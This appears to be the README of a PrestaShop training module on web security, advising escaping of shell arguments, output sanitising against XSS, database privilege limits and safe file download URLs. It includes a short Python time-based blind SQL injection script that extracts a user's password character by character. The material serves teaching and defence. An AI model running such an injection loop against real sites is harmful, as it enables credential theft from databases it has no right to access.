Module to helps you to understand what kinds of security issues exist and how you can prevent it.

A working Prestashop 1.7.5 instance and composer (only for development).

View presentation: https://docs.google.com/presentation/d/1IePuou2D3g1asvGQm1Ni68VLyyaAYJ5Kth7cWOM2cq4/edit?usp=sharing

Never execute something you can't control. Prefer whitelist as much as possible, or escape string. For example, if you're using Symfony\Component\Process\Process, use the default method to escape commands:

$process = new Process(
    [
        $this->getParameter('kernel.root_dir') . '/../bin/console',
        'debug:' . $type // This one will be automatically escaped
    ]
);
$process->run();

or escapeshellarg

$process = exec(
    __PS_ROOT_DIR__ . '/bin/console ' . 
    escapeshellarg('debug:' . $type)
);

If you don't care about this, you're completly wrong! A thief can take screenshot of your browser, retrieve all form data, control your webcam, get your cookies, ... And if you're using a CMS, with a little piece of code, can create and admin account without being notify. Get a look at (https://beefproject.com/)[https://beefproject.com/], you'll be surprised.

So, don't be shy, always sanitize data and do not display it directly, use htmlentities, htmlspecialchars, ...

Like others, never trust something you don't control. With a simple script, an attacker can retrieve or create many thing into your database. Or even try to bruteforce your database password.

found_chars = ''
for i in range(20):
    for c in characters:
        try:
            blind_sql = '?username='+username+'" AND IF(password like BINARY "' + found_chars + c + '%",sleep('+sleepTime+'),null)"'
            r = requests.get(target + blind_sql, timeout=5)
        except requests.exceptions.Timeout:
            found_chars += c
            print 'Found chars in password: ' + found_chars
            break

Watch out with rights you give to your database user.

Same as previous, use whitelist, identifier to request a file instead of its real name. Prefer http://website.com/download/files/2934 or http://website.com/download/files/my-file than http://website.com/download?file=csv/my-file.csv.